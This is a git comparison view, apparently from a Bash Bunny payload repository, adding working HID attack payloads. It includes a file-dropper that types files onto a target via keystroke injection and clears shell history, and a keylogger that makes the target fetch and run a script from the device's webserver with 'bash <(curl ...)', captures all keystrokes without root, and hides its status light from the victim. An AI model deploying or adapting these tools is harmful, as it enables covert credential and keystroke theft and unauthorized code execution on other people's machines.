Compare commits

..

14 Commits

Author SHA1 Message Date
Reda Couls 0ec8e1721c
Merge 8ad7759efd into 8d901a02a8 2024-09-22 22:21:18 +02:00
Peaks 8d901a02a8
Merge pull request #318 from bg-wa/drop
[Extension + Payload] The Ol'Drop'n'Run
2024-09-05 12:12:31 -04:00
Peaks 14fa7c490e
Merge pull request #322 from bg-wa/cross-platform-cmd-prompt
Cross platform command prompt extension
2024-09-05 12:04:31 -04:00
Peaks 2559d728b1
Merge pull request #376 from thedragonkeeper/keylogger
KeyLogger
2024-09-05 12:01:41 -04:00
TheDragonkeeper 963c000ab9 added keylogger 2019-04-06 00:50:03 +01:00
bg-wa a479964196 Win New file cleanup 2018-02-13 21:57:22 -08:00
bg-wa 17e0b3d50c Multi-OS (Untested) 2018-02-13 21:55:04 -08:00
bg-wa 5f06649cd2 Cross platform command prompt extension 2018-01-30 10:38:52 -08:00
bg-wa 9ab8820cc5 Moved payload to execution folder 2018-01-27 20:45:55 -08:00
bg-wa b3b9f75200 All Working with executable and overwite options 2018-01-27 18:33:25 -08:00
bg-wa 5c764849f3 Check Point 2018-01-27 10:31:59 -08:00
bg-wa afdafb27d6 The Ol'Drop'n'Run 2018-01-27 00:09:35 -08:00
bg-wa 821105a6a3 Cleanup LINUX only... 2018-01-27 00:05:57 -08:00
bg-wa 31ae33e78a Start of drop file 2018-01-26 20:36:59 -08:00
8 changed files with 385 additions and 0 deletions

103
payloads/extensions/drop.sh Normal file
View File

@ -0,0 +1,103 @@
#!/bin/bash
#
# DROP v1 by bg-wa
# Simplifies dropping files from HID attacks for LINUX
# Usage: DROP [OS] bb_source_file.txt attack_destination_file.txt [overwrite: false] [executable: false]
#
# Example:
# DROP UNITY /root/udisk/payloads/$SWITCH_POSITION/source.sh ~/target_destination.sh true true
source ./run.sh
function DROP() {
os=$1
source=$2
destination=$3
overwrite=$4
executable=$5
case "$os" in
WIN)
RUN WIN powershell
;;
OSX)
RUN OSX terminal
;;
UNITY)
RUN UNITY terminal
;;
LINUX)
RUN LINUX terminal
;;
*)
RUN UNITY terminal
;;
esac
QUACK DELAY 1000
if "$overwrite" == "true"
then
case "$os" in
WIN)
QUACK STRING del "$destination"
;;
*)
QUACK STRING rm "$destination"
;;
esac
QUACK ENTER
QUACK DELAY 500
fi
case "$os" in
WIN)
QUACK STRING fsutil file createnew "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING notepad.exe "$destination"
QUACK ENTER
QUACK DELAY 1000
;;
*)
QUACK STRING vi "$destination"
QUACK ENTER
QUACK DELAY 500
QUACK STRING i
;;
esac
while IFS= read -r data
do
QUACK STRING "$data"
QUACK ENTER
done < "$source"
QUACK DELAY 500
case "$os" in
WIN)
QUACK CTRL s
QUACK CRTL x
;;
*)
QUACK ESC
QUACK ENTER
QUACK STRING :wq
QUACK ENTER
if "$executable" == "true"
then
QUACK STRING chmod +x "$destination"
QUACK ENTER
QUACK DELAY 500
fi
QUACK STRING history -c
QUACK ENTER
QUACK STRING exit
QUACK ENTER
;;
esac
}
export -f DROP

View File

@ -0,0 +1,126 @@
#!/bin/bash
################################################################################
# Quickly get to a prompt on any platform with the BashBunny
#
# How this works?
# 1) Once the library is included in your payload, launch terminal\powershell\run
# with:
# PROMPT [OS]
# 2) OS options are:
# "AUTO" : Default - Hak5 2124 cross platform code
# "UNITY" : Launches Terminal in Unity
# "UNITY_RUN" : Opens run prompt in Unity
# "MAC" : Launches Terminal in OSX
# "POWERSHELL" : Launches Powershell in Windows
# "WINDOWS_RUN": Opens run prompt in Windows
# 3) To close a prompt use:
# CLOSE_PROMPT [OS]
################################################################################
################################################################################
# Start HID Prompt
################################################################################
function PROMPT() {
if [ -z "$1" ]; then
OS="AUTO"
else
OS=$1
fi
#AUTO
if [ "${OS}" = "AUTO" ]; then
LED G B 100
QUACK ALT F2
QUACK DELAY 50
QUACK GUI SPACE
QUACK DELAY 50
QUACK GUI r
clear_active_input
wait_enter_wait 200 1000
fi
#UNITY
if [ "${OS}" = "UNITY" ]; then
LED R B 100
QUACK GUI
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#UNITY_RUN
if [ "${OS}" = "UNITY_RUN" ]; then
LED R B 100
QUACK ALT F2
fi
#MAC
if [ "${OS}" = "MAC" ]; then
LED R B G 100
QUACK GUI SPACE
clear_active_input
QUACK STRING terminal
wait_enter_wait 200 1000
fi
#POWERSHELL
if [ "${OS}" = "POWERSHELL" ]; then
LED B 100
QUACK GUI
QUACK DELAY 500
QUACK powershell
wait_enter_wait 200 1000
fi
#WINDOWS_RUN
if [ "${OS}" = "WINDOWS_RUN" ]; then
LED B 100
QUACK GUI r
QUACK DELAY 500
fi
LED 0
}
function CLOSE_PROMPT() {
if [ -z "$1" ]; then
QUACK ALT F4
else
if [ "$1" = "MAC" ]; then
QUACK GUI w
else
QUACK ALT F4
fi
fi
}
# HELPER FUNCTIONS
function wait_enter_wait() {
if [ -z "$1" ]; then
BEFORE_WAIT=100
else
BEFORE_WAIT=$1
fi
if [ -z "$2" ]; then
AFTER_WAIT=100
else
AFTER_WAIT=$2
fi
QUACK DELAY ${BEFORE_WAIT}
QUACK ENTER
QUACK DELAY ${AFTER_WAIT}
}
function clear_active_input() {
QUACK DELAY 50
QUACK BACKSPACE
QUACK DELAY 100
}
export -f PROMPT
export -f CLOSE_PROMPT

View File

@ -0,0 +1,7 @@
#!/bin/bash
# Wake up and do something productive here instead...
sleep 10
# boom!!
firefox "http://hak5.org"

View File

@ -0,0 +1,30 @@
#!/bin/bash
#
# Title: The Ol'Drop'n'Run
# Author: bg-wa
# Version: 1.0
# Category: HID
# Target: UNITY
# Attackmodes: HID
#
# Quick HID only attack to write a file to target machine and open
#
# | Attack Stage | Description |
# | ------------------- | ---------------------------------------- |
# | SETUP | Open vi |
# | ATTACK | Writing files |
# | FINISH | Payload Dropped & ran (remove the bunny) |
#
ATTACKMODE HID
LED SETUP
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
target_script=\~/fuse.sh
LED ATTACK
DROP $source_script $target_script true true
RUN UNITY $target_script
LED FINISH

View File

@ -0,0 +1,20 @@
#/bin/bash
checkonbunny() {
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
if [ -d $mybunny ]; then
bashbunnyloot=$mybunny"/loot"
mapfile=$bashbunnyloot"/maps"
keyfile=$bashbunnyloot"/keys"
startwork
fi
}
startwork(){
getdevicetouse=${getdevicetouse#"id="}
xinput --test $getdevicetouse > $keyfile &
xmodmap -pke > $mapfile
}
BunnyID="ch000001"
bashbunnyloot=''
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
[[ -z $getdevicetouse ]] || checkonbunny

View File

@ -0,0 +1,28 @@
# Keylogger For Bash Bunny
Author: TheDragonkeeper
Version: Version 1
## Description
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
Captures all keyboard input without the need for root access
Uses the user keyboard map file for decoding the captured data
## STATUS
| LED | Status |
| ---------------- | ----------------------------------------------------------------------------- |
| Blue flash | Booting |
| Red slow | Waiting on webserver |
| Blue Fast | Identifying Target and deploying accordingly |
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
| LED Red Fast | Decoding keys, Then doing any cleanup required |
| Green flashing | Task complete, ready to unplug |
Still WIP, Currently supports linux (tested on ubuntu)
If you want to add payloads for OSX or Windows place them into the switch folder then,
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt

View File

@ -0,0 +1,43 @@
TARGET_OS='LINUX'
LED B 100
ATTACKMODE HID STORAGE ECM_ETHERNET
sleep 3
LED R SLOW
GET HOST_IP
GET SWITCH_POSITION
udisk mount
cd /root/udisk/payloads/$SWITCH_POSITION/
python webserver.py &
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
LED B FAST
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
LED
WAIT
LED R 0
cd /root/udisk/loot
keystate=''
_ctrl='0'
_alt='0'
_shift='0'
for line in $(cat 'keys')
do
if [ $line != 'key' ]; then
if [ $line == 'press' ] || [ $line == 'release' ]; then
keystate=$line
else
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
searchparams='keycode'"$_spaces"$line
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
fi
fi
done
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
LED G 0

View File

@ -0,0 +1,28 @@
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from os import curdir, sep
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path=="/":
self.path="/"
try:
sendReply = False
if self.path.endswith(".sh"):
mimetype='text/plain'
sendReply = True
if sendReply == True:
f = open(curdir + sep + self.path)
self.send_response(200)
self.send_header('Content-type',mimetype)
self.end_headers()
self.wfile.write(f.read())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
try:
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()